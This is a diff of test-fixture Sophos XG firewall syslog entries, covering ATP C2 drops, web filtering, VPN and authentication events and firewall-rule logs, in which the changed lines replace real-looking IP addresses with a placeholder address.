device_id=C44310050024-P29PUA log_id=086304418010 log_type="ATP" log_component="Firewall" log_subtype="Drop" priority=Warning user_name="jsmith" protocol="TCP" src_port=22623 dst_port=80 sourceip=10.198.47.71 destinationip=175.16.199.1 url=175.16.199.1 threatname=C2/Generic-A eventid=C366ACFB-7A6F-4870-B359-A6CFDA8C85F7 eventtype="Standard" login_user="" process_user="" ep_uuid= execution_path="" +<30>device="SFW" date=2020-05-18 time=14:38:34 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=086504418010 log_type="ATP" log_component="Web" log_subtype="Drop" priority=Warning user_name="" protocol="TCP" src_port=57579 dst_port=80 sourceip=175.16.199.1 destinationip=175.16.199.1 url=http://sophostest.com/callhome/index.html threatname=C2/Generic-A eventid=E91DAD80-BDE4-4682-B7E8-FE394B70A36C eventtype="Standard" login_user="" process_user="" ep_uuid="" execution_path="" +<30>device="SFW" date=2020-05-18 time=14:38:35 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=086504418010 log_type="ATP" log_component="Web" log_subtype="Drop" priority=Warning user_name="" protocol="TCP" src_port=57540 dst_port=80 sourceip=175.16.199.1 destinationip=175.16.199.1 url=http://sophostest.com/callhome/index.html threatname=C2/Generic-A eventid=34AC8531-E7C0-4368-9978-5740952EE9AB eventtype="Standard" login_user="" process_user="" ep_uuid="" execution_path="" +<30>device="SFW" date=2018-06-05 time=08:49:00 timezone="BST" device_name="XG310" device_id=C30006T22TGR89B log_id=086320518009 log_type="ATP" log_component="Firewall" log_subtype="Alert" priority=Notice user_name="" protocol="ICMP" src_port=0 dst_port=0 sourceip=10.198.32.89 destinationip=175.16.199.1 url=175.16.199.1 threatname=C2/Generic-A eventid=C7E26E6F-0097-4EA2-89DE-C31C40636CB2 eventtype="Standard" login_user="" process_user="" ep_uuid= execution_path="" +<30>device="SFW" date=2017-01-31 time=14:03:33 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="jsmith" user_gp="Open Group" iap=1 category="Entertainment" category_type="Unproductive" url="https://r8---sn-ci5gup-qxas.googlevideo.com/" contenttype="" override_token="" httpresponsecode="" src_ip=10.198.47.71 dst_ip=175.16.199.1 protocol="TCP" src_port=9444 dst_port=443 sent_bytes=0 recv_bytes=319007 domain=r8---sn-ci5gup-qxas.googlevideo.com exceptions= activityname="" reason="" +<30>device="SFW" date=2017-02-01 time=18:20:21 timezone="IST" device_name="SG115" device_id=S110000E28BA631 log_id=050902616002 log_type="Content Filtering" log_component="HTTP" log_subtype="Denied" status="" priority=Information fw_rule_id=1 user_name="" user_gp="" iap=13 category="Religion & Spirituality" category_type="Unproductive" url="http://hanuman.com/" contenttype="" override_token="" httpresponsecode="" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol="TCP" src_port=46719 dst_port=80 sent_bytes=0 recv_bytes=0 domain=hanuman.com exceptions= activityname="" +<30>device="SFW" date=2017-02-01 time=18:13:29 timezone="IST" device_name="SG115" device_id=S110016E28BA631 log_id=054402617051 log_type="Content Filtering" log_component="Application" log_subtype="Denied" priority=Information fw_rule_id=1 user_name="" user_gp="" application_filter_policy=8 category="Mobile Applications" application_name="Gtalk Android" application_risk=4 application_technology="Client Server" application_category="Mobile Applications" src_ip=175.16.199.1 src_country_code=DEU dst_ip=175.16.199.1 dst_country_code=USA protocol="TCP" src_port=49128 dst_port=5228 sent_bytes=0 recv_bytes=0 status="Deny" message="" +<30>device="SFW" date=2020-05-18 time=14:38:51 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="" user_gp="" iap=13 category="Information Technology" category_type="Acceptable" url="https://his-eur1-neur1.servicebus.windows.net/$servicebus/websocket" contenttype="" override_token="" httpresponsecode="" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol="TCP" src_port=62851 dst_port=443 sent_bytes=259 recv_bytes=168 domain=his-eur1-neur1.servicebus.windows.net exceptions="" activityname="" reason="" user_agent="" status_code="400" transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=80042000 application="" app_is_cloud=0 override_name="" override_authorizer="" +<30>device="SFW" date=2020-05-18 time=14:38:52 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=050902616002 log_type="Content Filtering" log_component="HTTP" log_subtype="Denied" status="" priority=Information fw_rule_id=51 user_name="" user_gp="" iap=2 category="IPAddress" category_type="Acceptable" url="https://175.16.199.1/" contenttype="" override_token="" httpresponsecode="" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol="TCP" src_port=60471 dst_port=443 sent_bytes=0 recv_bytes=0 domain=175.16.199.1 exceptions="" activityname="" reason="" user_agent="" status_code="200" transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=642960832 application="" app_is_cloud=0 override_name="" override_authorizer="" +<30>device="SFW" date=2020-05-18 time=14:38:53 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="" user_gp="" iap=13 category="Information Technology" category_type="Acceptable" url="http://update.eset.com/eset_upd/ep7/dll/update.ver.signed" contenttype="" override_token="" httpresponsecode="" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol="TCP" src_port=65391 dst_port=80 sent_bytes=980 recv_bytes=295 domain=update.eset.com exceptions=av,https,sandstorm activityname="" reason="" user_agent="EFSW Update (Windows; U; 64bit; BPC 7.1.12010.0; OS: 10.0.17763 SP 0.0 NT; TDB 45511; CL 1.1.1; x64s; APP efsw; PX 1; PUA 1; CD 1; RA 1; PEV 0; UNS 1; UBR 1158; HVCI 0; SHA256 1; WU 3; HWF: 01009DAA-757A-D666-EFD2-92DD0D501284; PLOC de_de; PCODE 211.0.0; " status_code="304" transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=248426360 application="" app_is_cloud=0 override_name="" override_authorizer="" <30>device="SFW" date=2016-12-02 time=18:50:20 timezone="GMT" device_name="SF01V" device_id=1234567890123456 log_id=058420116010 log_type="Content Filtering" log_component="Web Content Policy" log_subtype="Alert" user="gi123456" src_ip=10.108.108.49 transaction_id="e4a127f7-a850-477c-920e-a471b38727c1" dictionary_name="complicated_Custom" site_category=Information Technology website="ta-web-static-testing.qa. astaro.de" direction="in" action="Deny" file_name="cgi_echo.pl" context_match="Not" context_prefix="blah blah hello " context_suffix=" hello blah " -<30>device="SFW" date=2016-12-02 time=18:50:20 timezone="GMT" device_name="SFVUNL" device_id=C01001K234RXPA1 log_id=050927616005 log_type="Content Filtering" log_component="HTTP" log_subtype="Warned" status="" priority=Information fw_rule_id=2 user_name="rich" user_gp="Clientless Open Group" iap=13 category="Search Engines" category_type="Acceptable" url="http://www.google.com/" contenttype="" override_token="" httpresponsecode="" src_ip=192.168.73.220 dst_ip=64.233.189.147 protocol="TCP" src_port=37832 dst_port=80 sent_bytes=0 recv_bytes=0 domain=www.google.com exceptions= activityname=" Search" reason="" -<30>device="SFW" date=2016-12-02 time=18:50:22 timezone="GMT" device_name="SFVUNL" device_id=C01001K234RXPA1 log_id=050901616006 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="rich" user_gp="Clientless Open Group" iap=13 category="Search Engines" category_type="Acceptable" url="http://www.google.ca/?gfe_rd=cr&ei=ojxHWP3WC4WN8QeRioDABw" contenttype="text/html" override_token="" httpresponsecode="" src_ip=192.168.73.220 dst_ip=64.233.188.94 protocol="TCP" src_port=46322 dst_port=80 sent_bytes=0 recv_bytes=619 domain=www.google.ca exceptions= activityname="Search" reason="not eligible" -<30>device="SFW" date=2020-05-18 time=14:38:57 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062910617701 log_type="Event" log_component="Firewall Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="Open Group" auth_client="CTA" auth_mechanism="AD" reason="" src_ip=172.17.35.116 message="User elastic.user@elastic.test.com of group Open Group logged in successfully to Firewall through AD authentication mechanism from 172.17.35.116" name="elastic.user@elastic.test.com" src_mac= -<30>device="SFW" date=2020-05-18 time=14:38:58 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062511418055 log_type="Event" log_component="IPSec" log_subtype="System" status="Failed" priority=Warning user_name="elastic.user@elastic.test.com" connectionname="Location-1" connectiontype="0" localinterfaceip=214.167.51.66 localgateway="" localnetwork="172.17.32.0/19" remoteinterfaceip=83.20.132.250 remotenetwork="10.84.234.5/32" message="location-1 - IKE message retransmission timed out (Remote: 83.20.132.250)" +<30>device="SFW" date=2016-12-02 time=18:50:20 timezone="GMT" device_name="SFVUNL" device_id=C01001K234RXPA1 log_id=050927616005 log_type="Content Filtering" log_component="HTTP" log_subtype="Warned" status="" priority=Information fw_rule_id=2 user_name="rich" user_gp="Clientless Open Group" iap=13 category="Search Engines" category_type="Acceptable" url="http://www.google.com/" contenttype="" override_token="" httpresponsecode="" src_ip=192.168.73.220 dst_ip=175.16.199.1 protocol="TCP" src_port=37832 dst_port=80 sent_bytes=0 recv_bytes=0 domain=www.google.com exceptions= activityname=" Search" reason="" +<30>device="SFW" date=2016-12-02 time=18:50:22 timezone="GMT" device_name="SFVUNL" device_id=C01001K234RXPA1 log_id=050901616006 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="rich" user_gp="Clientless Open Group" iap=13 category="Search Engines" category_type="Acceptable" url="http://www.google.ca/?gfe_rd=cr&ei=ojxHWP3WC4WN8QeRioDABw" contenttype="text/html" override_token="" httpresponsecode="" src_ip=192.168.73.220 dst_ip=175.16.199.1 protocol="TCP" src_port=46322 dst_port=80 sent_bytes=0 recv_bytes=619 domain=www.google.ca exceptions= activityname="Search" reason="not eligible" +<30>device="SFW" date=2020-05-18 time=14:38:57 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062910617701 log_type="Event" log_component="Firewall Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="Open Group" auth_client="CTA" auth_mechanism="AD" reason="" src_ip=175.16.199.1 message="User elastic.user@elastic.test.com of group Open Group logged in successfully to Firewall through AD authentication mechanism from 175.16.199.1" name="elastic.user@elastic.test.com" src_mac= +<30>device="SFW" date=2020-05-18 time=14:38:58 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062511418055 log_type="Event" log_component="IPSec" log_subtype="System" status="Failed" priority=Warning user_name="elastic.user@elastic.test.com" connectionname="Location-1" connectiontype="0" localinterfaceip=175.16.199.1 localgateway="" localnetwork="175.16.199.1/19" remoteinterfaceip=175.16.199.1 remotenetwork="10.84.234.5/32" message="location-1 - IKE message retransmission timed out (Remote: 175.16.199.1)" <30>device="SFW" date=2020-05-18 time=14:38:59 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062511318057 log_type="Event" log_component="IPSec" log_subtype="System" status="Expire" priority=Error user_name="" connectionname="" connectiontype="0" localinterfaceip="" localgateway="" localnetwork="" remoteinterfaceip="" remotenetwork="" message="IKE_SA timed out before it could be established" -<30>device="SFW" date=2020-05-18 time=14:39:00 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063210617704 log_type="Event" log_component="My Account Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="" auth_client="N/A" auth_mechanism="Local" reason="" src_ip=83.9.140.96 message="User elastic.user@elastic.test.com logged in successfully to MyAccount through Local authentication mechanism" name="" src_mac= +<30>device="SFW" date=2020-05-18 time=14:39:00 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063210617704 log_type="Event" log_component="My Account Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="" auth_client="N/A" auth_mechanism="Local" reason="" src_ip=175.16.199.1 message="User elastic.user@elastic.test.com logged in successfully to MyAccount through Local authentication mechanism" name="" src_mac= <30>device="SFW" date=2020-05-18 time=14:39:01 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=064011517819 log_type="Event" log_component="Anti-Virus" log_subtype="System" priority=Notice status="Successful" oldversion=1.0.407794 newversion=1.0.407795 message="Avira AV definitions upgraded from 1.0.407794 to 1.0.407795." <30>device="SFW" date=2020-05-18 time=14:39:02 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=063411660022 log_type="Event" log_component="DHCP Server" log_subtype="System" status="Expire" priority=Information ipaddress="192.168.110.10" client_physical_address="-" client_host_name="" message="Lease 192.168.110.10 expired" raw_data="192.168.110.10" -<30>device="SFW" date=2020-05-18 time=14:39:03 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063110617710 log_type="Event" log_component="SSL VPN Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="" auth_client="N/A" auth_mechanism="AD" reason="" src_ip=217.250.157.135 message="User elastic.user@elastic.test.com authenticated successfully to login to SSLVPN through AD authentication mechanism" name="" src_mac= +<30>device="SFW" date=2020-05-18 time=14:39:03 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063110617710 log_type="Event" log_component="SSL VPN Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="" auth_client="N/A" auth_mechanism="AD" reason="" src_ip=175.16.199.1 message="User elastic.user@elastic.test.com authenticated successfully to login to SSLVPN through AD authentication mechanism" name="" src_mac= <30>device="SFW" date=2020-05-18 time=14:39:04 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062811617824 log_type="Event" log_component="SSL VPN" log_subtype="System" priority=Information Mode="Remote Access" sessionid="" starttime=0 user_name="elastic.user@elastic.test.com" ipaddress=10.82.234.5 sent_bytes=0 recv_bytes=0 status="Established" message="SSL VPN User 'elastic.user@elastic.test.com' connected " timestamp=1589960866 connectionname="" remote_ip=10.82.234.12 -<30>device="SFW" date=2020-05-18 time=14:39:05 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063010517708 log_type="Event" log_component="VPN Authentication" log_subtype="Authentication" status="Failed" priority=Notice user_name="hendrikl" usergroupname="" auth_client="N/A" auth_mechanism="AD,AD,Local" reason="wrong credentials" src_ip=91.67.201.4 message="User elastic01 failed to login to VPN through AD,AD,Local authentication mechanism because of wrong credentials" name="" src_mac= +<30>device="SFW" date=2020-05-18 time=14:39:05 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063010517708 log_type="Event" log_component="VPN Authentication" log_subtype="Authentication" status="Failed" priority=Notice user_name="hendrikl" usergroupname="" auth_client="N/A" auth_mechanism="AD,AD,Local" reason="wrong credentials" src_ip=175.16.199.1 message="User elastic01 failed to login to VPN through AD,AD,Local authentication mechanism because of wrong credentials" name="" src_mac= <30>device="SFW" date=2020-05-18 time=14:39:06 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=066911518017 log_type="Event" log_component="ATP" log_subtype="System" priority=Notice status="Successful" oldversion=1.0.0297 newversion=1.0.0298 message="ATP definitions upgraded from 1.0.0297 to 1.0.0298." <30>device="SFW" date=2020-05-18 time=14:39:07 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=062009617502 log_type="Event" log_component="GUI" log_subtype="Admin" status="Successful" priority=Information user_name="admin" src_ip=10.83.234.5 SysLog_SERVER_NAME='Logstash' message="SysLog Server 'Logstash' settings were changed by 'admin' from '10.83.234.5' using 'GUI'" -<30>device="SFW" date=2020-05-18 time=14:39:08 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062109517507 log_type="Event" log_component="CLI" log_subtype="Admin" status="Failed" priority=Notice user_name="root" src_ip=172.66.35.15 message="User 'root' failed to login from '172.66.35.15' using ssh because of wrong credentials" +<30>device="SFW" date=2020-05-18 time=14:39:08 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062109517507 log_type="Event" log_component="CLI" log_subtype="Admin" status="Failed" priority=Notice user_name="root" src_ip=175.16.199.1 message="User 'root' failed to login from '175.16.199.1' using ssh because of wrong credentials" <30>device="SFW" date=2020-05-18 time=14:39:09 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063911517818 log_type="Event" log_component="IPS" log_subtype="System" priority=Notice status="Successful" oldversion=9.17.09 newversion=9.17.10 message="IPS definitions upgraded from 9.17.09 to 9.17.10." <30>device="SFW" date=2020-05-18 time=14:39:10 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063311617923 log_type="Event" log_component="Appliance" log_subtype="System" priority=Information backup_mode='appliance' message="Scheduled backup to appliance is successful." <30>device="SFW" date=2020-05-18 time=14:39:20 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=062910617703 log_type="Event" log_component="Firewall Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="VPN.SSL.Users.elastic" auth_client="IPSec" auth_mechanism="N/A" reason="" src_ip=10.84.234.38 src_mac="" start_time=1591086575 sent_bytes=0 recv_bytes=0 message="User elastic.user@elastic.test.com was logged out of firewall" name="elastic.user@elastic.test.com" timestamp=1591086576 @@ -49,29 +49,29 @@ <30>device="SFW" date=2017-03-16 time=12:53:27 timezone="IST" device_name="XG125w" device_id=S1601E1F9FCB7EE log_id=066811618015 log_type="Event" log_component="RED" log_subtype="System" priority=Information red_id=A350196C47072B0 status="Disconnected" eventtime="2017-03-16 12:53:27 IST" duration=0 branch_name=Gaurav Patel recv_bytes=31488 sent_bytes=22368 message="A350196C47072B0/Gaurav Patel is now disconnected" <30>device="SFW" date=2017-03-16 time=12:46:26 timezone="IST" device_name="XG125w" device_id=S1601E1F9FCB7EE log_id=066811618016 log_type="Event" log_component="RED" log_subtype="System" priority=Information red_id=A350196C47072B0 status="Interim" eventtime="2017-03-16 12:46:26 IST" duration=0 branch_name=NY recv_bytes=0 sent_bytes=0 message="A350196C47072B0/NY transfered bytes TX: 0 RX: 0" <30>device="SFW" date=2018-06-06 time=11:12:10 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=063711517815 log_type="Event" log_component="DDNS" log_subtype="System" status="Success" priority=Notice host=test1. customtest.dyndns.org updatedip=10.198.232.86 reason="" message="DDNS update for host test1.customtest.dyndns.org was Successful. Updated with IP 10.198.232.86." -<30>device="SFW" date=2020-05-18 time=14:38:37 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=11 fw_rule_id=21 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="HTTP" application_risk=1 application_technology="Browser Based" application_category="General Internet" in_interface="Port1" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=172.17.34.15 src_country_code=R1 dst_ip=91.228.167.86 dst_country_code=SVK protocol="TCP" src_port=62841 dst_port=80 sent_pkts=6 recv_pkts=5 sent_bytes=459 recv_bytes=606 tran_src_ip=213.167.51.66 tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="LAN" srczone="LAN" dstzonetype="WAN" dstzone="WAN" dir_disp="" connevent="Stop" connid="1617925280" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:38 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=0 fw_rule_id=67 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=15 appfilter_policy_id=0 application="DNS" application_risk=1 application_technology="Network Protocol" application_category="Infrastructure" in_interface="Port3.400" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=172.16.66.155 src_country_code=R1 dst_ip=91.228.165.117 dst_country_code=SVK protocol="UDP" src_port=49144 dst_port=53 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=185.8.209.194 tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="DMZ" srczone="DMZ" dstzonetype="WAN" dstzone="WAN" dir_disp="" connevent="Start" connid="3360392048" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:39 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010102600002 log_type="Firewall" log_component="Firewall Rule" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name="" user_gp="" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="Port2" src_mac=24:01:c7:07:2b:a2 src_ip=172.17.35.113 src_country_code="" dst_ip=172.20.4.52 dst_country_code="" protocol="TCP" src_port=53287 dst_port=4980 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:37 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=11 fw_rule_id=21 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="HTTP" application_risk=1 application_technology="Browser Based" application_category="General Internet" in_interface="Port1" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=SVK protocol="TCP" src_port=62841 dst_port=80 sent_pkts=6 recv_pkts=5 sent_bytes=459 recv_bytes=606 tran_src_ip=175.16.199.1 tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="LAN" srczone="LAN" dstzonetype="WAN" dstzone="WAN" dir_disp="" connevent="Stop" connid="1617925280" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:38 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=0 fw_rule_id=67 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=15 appfilter_policy_id=0 application="DNS" application_risk=1 application_technology="Network Protocol" application_category="Infrastructure" in_interface="Port3.400" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=SVK protocol="UDP" src_port=49144 dst_port=53 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=175.16.199.1 tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="DMZ" srczone="DMZ" dstzonetype="WAN" dstzone="WAN" dir_disp="" connevent="Start" connid="3360392048" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:39 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010102600002 log_type="Firewall" log_component="Firewall Rule" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name="" user_gp="" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="Port2" src_mac=24:01:c7:07:2b:a2 src_ip=175.16.199.1 src_country_code="" dst_ip=175.16.199.1 dst_country_code="" protocol="TCP" src_port=53287 dst_port=4980 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 <30>device="SFW" date=2020-05-18 time=14:38:40 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010102600002 log_type="Firewall" log_component="Firewall Rule" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name="elastic@user.local" user_gp="elastic.group.local" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="tun0" out_interface="Port1" src_mac="" src_ip=10.82.234.6 src_country_code="" dst_ip=192.168.0.1 dst_country_code="" protocol="TCP" src_port=60102 dst_port=53 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:41 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010302602002 log_type="Firewall" log_component="Appliance Access" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port2" out_interface="" src_mac=c4:f7:d5:b5:47:f4 src_ip=51.77.56.9 src_country_code="" dst_ip=185.7.209.207 dst_country_code="" protocol="TCP" src_port=55039 dst_port=18 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:42 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010102600002 log_type="Firewall" log_component="Firewall Rule" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name="elastic@user.local" user_gp="elastic.group.local" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="Port2" src_mac=24:01:c7:07:2b:a2 src_ip=172.17.35.101 src_country_code="" dst_ip=192.168.5.11 dst_country_code="" protocol="TCP" src_port=51826 dst_port=1109 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:43 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010402403001 log_type="Firewall" log_component="DoS Attack" log_subtype="Denied" status="Deny" priority=Warning duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="" src_mac=34:db:fd:83:d8:09 src_ip=172.16.36.105 src_country_code="" dst_ip=10.84.234.14 dst_country_code="" protocol="UDP" src_port=3389 dst_port=64465 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:41 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010302602002 log_type="Firewall" log_component="Appliance Access" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port2" out_interface="" src_mac=c4:f7:d5:b5:47:f4 src_ip=175.16.199.1 src_country_code="" dst_ip=175.16.199.1 dst_country_code="" protocol="TCP" src_port=55039 dst_port=18 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:42 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010102600002 log_type="Firewall" log_component="Firewall Rule" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name="elastic@user.local" user_gp="elastic.group.local" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="Port2" src_mac=24:01:c7:07:2b:a2 src_ip=175.16.199.1 src_country_code="" dst_ip=192.168.5.11 dst_country_code="" protocol="TCP" src_port=51826 dst_port=1109 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:43 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010402403001 log_type="Firewall" log_component="DoS Attack" log_subtype="Denied" status="Deny" priority=Warning duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 